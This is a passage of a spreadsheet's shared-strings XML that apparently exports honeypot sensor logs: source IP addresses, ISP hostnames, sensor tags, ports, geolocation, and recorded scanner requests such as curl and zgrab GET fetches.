    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H17&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H7</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;35855&amp;&amp;23&amp;&amp;9100&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:dc85:28a8</t>
  </si>
  <si>
    <t>e40dff9e83fad7feb98392b1989f526e</t>
  </si>
  <si>
    <t>60.248.68.185</t>
  </si>
  <si>
    <t>NA&amp;&amp;60-248-68-185.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H25</t>
  </si>
  <si>
    <t>23&amp;&amp;44303&amp;&amp;45452&amp;&amp;9100</t>
  </si>
  <si>
    <t>2004-10-29</t>
  </si>
  <si>
    <t>::ffff:3cf8:44b9</t>
  </si>
  <si>
    <t>6915dccdfc7cebd2341f89a0daa21521</t>
  </si>
  <si>
    <t>220.133.82.141</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-133-82-141.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H33</t>
  </si>
  <si>
    <t>23&amp;&amp;9100&amp;&amp;NA&amp;&amp;58937</t>
  </si>
  <si>
    <t>::ffff:dc85:528d</t>
  </si>
  <si>
    <t>25200dc85497c342c27da076837b76cf</t>
  </si>
  <si>
    <t>121.121.163.81</t>
  </si>
  <si>
    <t>Maxisnet Hsdpa</t>
  </si>
  <si>
    <t>::ffff:7979:a351</t>
  </si>
  <si>
    <t>9a6f1110c7c83383dfc3b4ab2fbf5c0f</t>
  </si>
  <si>
    <t>59.126.81.234</t>
  </si>
  <si>
    <t>59-126-81-234.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_DNS_H13&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;45641&amp;&amp;23&amp;&amp;3984&amp;&amp;57919&amp;&amp;43686&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:3b7e:51ea</t>
  </si>
  <si>
    <t>48a68deef567021264963e591617364a</t>
  </si>
  <si>
    <t>117.203.130.219</t>
  </si>
  <si>
    <t>::ffff:75cb:82db</t>
  </si>
  <si>
    <t>5ece7a0f9a6b0051b612c7c330ac13c5</t>
  </si>
  <si>
    <t>125.229.138.168</t>
  </si>
  <si>
    <t>125-229-138-168.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_DNS_H29&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;32155&amp;&amp;23&amp;&amp;NA&amp;&amp;10862</t>
  </si>
  <si>
    <t>::ffff:7de5:8aa8</t>
  </si>
  <si>
    <t>0cd3d20b5343cbedaf903ad29f293de9</t>
  </si>
  <si>
    <t>114.33.209.132</t>
  </si>
  <si>
    <t>114-33-209-132.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H27</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1680&amp;&amp;23&amp;&amp;47941&amp;&amp;47264&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7221:d184</t>
  </si>
  <si>
    <t>934eb19a66d9a78ff6f43d696d53e69f</t>
  </si>
  <si>
    <t>61.3.55.215</t>
  </si>
  <si>
    <t>::ffff:3d03:37d7</t>
  </si>
  <si>
    <t>bf38d6de861808ca9b4c8f832562e1d7</t>
  </si>
  <si>
    <t>220.132.126.94</t>
  </si>
  <si>
    <t>220-132-126-94.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_HTTP_H40&amp;&amp;SMA-LAB_SSH_H15&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;80&amp;&amp;22&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc84:7e5e</t>
  </si>
  <si>
    <t>3fc843bff3fbf31d8ee1dd39ee224c39</t>
  </si>
  <si>
    <t>117.255.47.40</t>
  </si>
  <si>
    <t>::ffff:75ff:2f28</t>
  </si>
  <si>
    <t>244f85fa47a073ea9d620a7db3979247</t>
  </si>
  <si>
    <t>27.59.21.114</t>
  </si>
  <si>
    <t>Bharti Tele Ventures Ltd</t>
  </si>
  <si>
    <t>::ffff:1b3b:1572</t>
  </si>
  <si>
    <t>57b6e2a32636cab0f95248046bca549f</t>
  </si>
  <si>
    <t>220.132.157.191</t>
  </si>
  <si>
    <t>220-132-157-191.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;38068&amp;&amp;23&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:dc84:9dbf</t>
  </si>
  <si>
    <t>d3e9a28cdc1b2939558525b5979d3995</t>
  </si>
  <si>
    <t>146.190.173.178</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>37.3986</t>
  </si>
  <si>
    <t>-121.964</t>
  </si>
  <si>
    <t>{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/ab2g'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'GET', 'uri': '/ab2h'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:92be:adb2</t>
  </si>
  <si>
    <t>d16969b4f8079692e64cf7ddc0a0ec92</t>
  </si>
  <si>
    <t>59.93.123.136</t>
  </si>
  <si>
    <t>::ffff:3b5d:7b88</t>
  </si>
  <si>
    <t>86ad4131ea525392e58c72d7855623ec</t>
  </si>
  <si>
    <t>220.133.203.74</t>
  </si>
  <si>
    <t>220-133-203-74.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H33&amp;&amp;SMA-LAB_DNS_H3&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_SMB_H20&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;53&amp;&amp;9100&amp;&amp;389&amp;&amp;445&amp;&amp;1080&amp;&amp;5900&amp;&amp;80&amp;&amp;23651&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dc85:cb4a</t>
  </si>
  <si>
    <t>42bda2350674a5af90b86a7a9bd85f33</t>
  </si>
  <si>
    <t>103.171.201.234</t>
  </si>
  <si>
    <t>SMA-LAB_IRC_H24&amp;&amp;SMA-LAB_VNC_H28&amp;&amp;SMA-LAB_SSH_H7&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_DNS_H37&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>6667&amp;&amp;5900&amp;&amp;22&amp;&amp;389&amp;&amp;443&amp;&amp;53&amp;&amp;27869&amp;&amp;1433&amp;&amp;57489</t>
  </si>
  <si>
    <t>Airoli</t>
  </si>
  <si>
    <t>7279599</t>
  </si>
  <si>
    <t>19.151</t>
  </si>
  <si>
    <t>72.9962</t>
  </si>
  <si>
    <t>137127</t>
  </si>
  <si>
    <t>Navkar Supertech Pvt Ltd</t>
  </si>
  <si>
    <t>Omsainet</t>
  </si>
  <si>
    <t>2021-08-16</t>
  </si>
  <si>
    <t>OMSAINET</t>
  </si>
  <si>
    <t>::ffff:67ab:c9ea</t>
  </si>
  <si>
    <t>0c7721a4865f43ca177369e536b0d3d0</t>
  </si>
  <si>
    <t>122.116.113.188</t>
  </si>
  <si>
    <t>122-116-113-188.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>23&amp;&amp;80&amp;&amp;NA&amp;&amp;44647</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a74:71bc</t>
  </si>
  <si>
    <t>d5a3e78c1ad799fb3e98962af9b8c3a4</t>
  </si>
  <si>
    <t>123.18.140.119</t>
  </si>
  <si>
    <t>::ffff:7b12:8c77</t>
  </si>
  <si>
    <t>389d0786ef0387113f12f354ff760069</t>
  </si>
  <si>
    <t>59.97.245.126</t>
  </si>
  <si>
    <t>::ffff:3b61:f57e</t>
  </si>
  <si>
    <t>2699f3abaee32e4683acb2291cea6686</t>
  </si>
  <si>
    <t>117.242.234.122</t>
  </si>
  <si>
    <t>::ffff:75f2:ea7a</t>
  </si>
  <si>
    <t>a1738f6669d6780fe5477e217a7145bd</t>
  </si>
  <si>
    <t>121.183.75.18</t>
  </si>
  <si>
    <t>SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_HTTP_H46&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SSH_H37&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>1080&amp;&amp;9100&amp;&amp;5900&amp;&amp;443&amp;&amp;80&amp;&amp;389&amp;&amp;445&amp;&amp;22&amp;&amp;4332&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:79b7:4b12</t>
  </si>
  <si>
    <t>b60ac660c0ce4f5f61325ee808929706</t>
  </si>
  <si>
    <t>122.117.36.249</t>
  </si>
  <si>
    <t>122-117-36-249.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H9&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;24642&amp;&amp;80&amp;&amp;23&amp;&amp;NA&amp;&amp;9100&amp;&amp;62440</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a75:24f9</t>
  </si>
  <si>
    <t>ceab219d2e60f496ca97beadd07f8a9e</t>
  </si>
  <si>
    <t>115.97.117.53</t>
  </si>
  <si>
    <t>::ffff:7361:7535</t>
  </si>
  <si>
    <t>566811598fc970bded6eefffd76e9c79</t>
  </si>
  <si>
    <t>218.161.88.19</t>
  </si>
  <si>
    <t>218-161-88-19.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H37</t>
  </si>
  <si>
    <t>::ffff:daa1:5813</t>
  </si>
  <si>
    <t>035916d7b46169eb8fbd2b69de7809e8</t>
  </si>
  <si>
    <t>117.203.209.67</t>
  </si>
  <si>
    <t>::ffff:75cb:d143</t>
  </si>
  <si>
    <t>02d4c312125099576764952a7327a008</t>
  </si>
  <si>
    <t>114.34.18.147</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-34-18-147.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;4082&amp;&amp;23&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:7222:1293</t>
  </si>
  <si>
    <t>4b5142827793cfd5659a06eb4f6a7343</t>
  </si>
  <si>
    <t>117.193.49.171</t>
  </si>
  <si>
    <t>::ffff:75c1:31ab</t>
  </si>
  <si>
    <t>5c9d7def9ed7e7f644c30928d1406430</t>
  </si>
  <si>
    <t>220.134.19.210</t>
  </si>
  <si>
    <t>220-134-19-210.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
